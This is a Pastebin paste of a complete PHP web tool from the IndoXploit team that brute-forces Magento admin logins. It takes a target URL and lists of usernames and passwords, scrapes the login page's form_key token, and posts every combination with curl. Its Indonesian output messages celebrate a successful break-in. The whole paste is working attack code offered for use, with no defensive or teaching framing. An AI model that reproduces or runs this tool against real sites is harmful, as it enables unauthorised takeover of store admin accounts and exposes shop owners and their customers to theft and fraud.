AgusSR

Magento CMS BruteForce Admin Login

Nov 24th, 2015
1,222
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <html>
  2.     <head>
  3.     <title>MAGENTO CMS ADMIN BruteForce - IndoXploit Coders Team</title>
  4.     <meta name="author" content="Mr. Error 404 | IndoXploit"/>
  5.     <meta charset="UTF-8"/>
  6.     </head>
  7. <center>
  8. <html style="margin: 2em auto; color: #008000; background: #000000;">
  9. <form method="post">
  10. URL: <input type="text" name="url" size="35" height="10" style="padding-left: 5px; background: transparent; color: #bb0000; border: 1px #008000 solid;"value="http://www.target-magento.com/admin"><br>
  11. <textarea placeholder="username" name="user" style="background: transparent; color: #bb0000; border: 1px #008000 solid; padding-left: 5px; margin: 5px auto; width: 400px; height: 250px; resize: none;"></textarea>
  12. <textarea placeholder="password" name="password" style="background: transparent; color: #bb0000; border: 1px #008000 solid; padding-left: 5px; margin: 5px auto; width: 400px; height: 250px; resize: none;"></textarea><br>
  13. <input type="submit" name="brute" style="width: 200px; height: 25px; background: transparent; color: #bb0000; border: 1px #008000 solid;">
  14. </form>
  15. </html>
  16. <?php
  17. $url = $_POST['url'];
  18. $user = explode("\r\n", $_POST['user']);
  19. $pass = explode("\r\n", $_POST['password']);
  20. $go = $_POST['brute'];
  21. if($go) {
  22.     $ambil = htmlspecialchars(@file_get_contents($url));
  23.     preg_match("/<input name=\"form_key\" type=\"hidden\" value=\"(.*?)\">/", $ambil, $key);
  24.     foreach($user as $admin) {
  25.         foreach($pass as $pwd) {
  26.             $data = array(
  27.                 "form_key" => $key[1],
  28.                 "login[username]" => $admin,
  29.                 "dummy" => "",
  30.                 "login[password]" => $pwd,
  31.                 );
  32.             $c = curl_init();
  33.                  curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
  34.                  curl_setopt($c, CURLOPT_URL, $url);
  35.                  curl_setopt($c, CURLOPT_POST, 1);
  36.                  curl_setopt($c, CURLOPT_POSTFIELDS, $data);
  37.                  curl_setopt($c, CURLOPT_FOLLOWLOCATION, 1);
  38.                  curl_setopt($c, CURLOPT_COOKIEFILE, 'cookie.txt');
  39.                  curl_setopt($c, CURLOPT_COOKIESESSION, 1);
  40.             $result = curl_exec($c);
  41.             curl_close($c);
  42.             if(preg_match("/Log Out/", $result)) {
  43.                 echo "<div style='margin: 7px auto;'></div>";
  44.                 echo "[+] Nyecan di: <b>$url</b><br>";
  45.                 echo "[+] <font color=lime>Admin berhasil di Brute!!!</font><br>";
  46.                 echo "[+] username: <font color=lime>$admin</font> | password: <font color=lime>$pwd</font><br>";
  47.                 echo "[+] Selamat Cokk, anda ganteng sekali!! leeel :v /<br>";
  48.             } else {
  49.                 echo "<div style='margin: 7px auto;'></div>";
  50.                 echo "[+] Nyecan di: <b>$url</b><br>";
  51.                 echo "[!!] username: $admin | password: $pwd<br>";
  52.                 echo "[-] <font color=red>Gagal brute admin pake user & pass ini cok !</font><br>";
  53.             }
  54.         }
  55.     }
  56. echo "<div style='margin: 7px auto;'></div>";
  57. echo "======================================================<br>";
  58. echo "Tools ini dibuat oleh: IndoXploit Coders Team. | Copas Script gua berantemin lu jembut !! :3 <br>";
  59. echo "======================================================<br>";
  60. }
  61. ?>
RAW Paste Data